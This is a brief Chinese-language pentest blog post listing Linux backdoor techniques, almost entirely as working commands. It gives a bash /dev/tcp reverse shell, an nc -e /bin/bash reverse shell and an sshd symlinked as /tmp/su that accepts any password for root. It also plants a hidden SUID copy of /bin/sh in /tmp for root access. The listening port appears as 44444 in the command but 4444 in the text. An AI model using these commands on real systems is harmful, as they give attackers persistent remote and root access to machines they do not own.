Linux 的几种后门

X1r0z included in Pentest

2018-01-26 2018-01-26 About 100 words One minute

Contents

Linux 的 bash nc ssh SUID 后门

bash -i >& /dev/tcp/ip/port 0>&1

nc ip port -e /bin/bash

nc 可以从源码编译.

./configure --prefix=/tmp/nc && make && make install

ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=44444;

连接 4444 用 root/bin/ftp/mail 当用户名密码随意.

执行用户会获得该文件所有者的权限.

cp /bin/sh /tmp/.shell && chmod 4755 /tmp/.shell

执行 /tmp/.shell -p 即可获得 root 权限.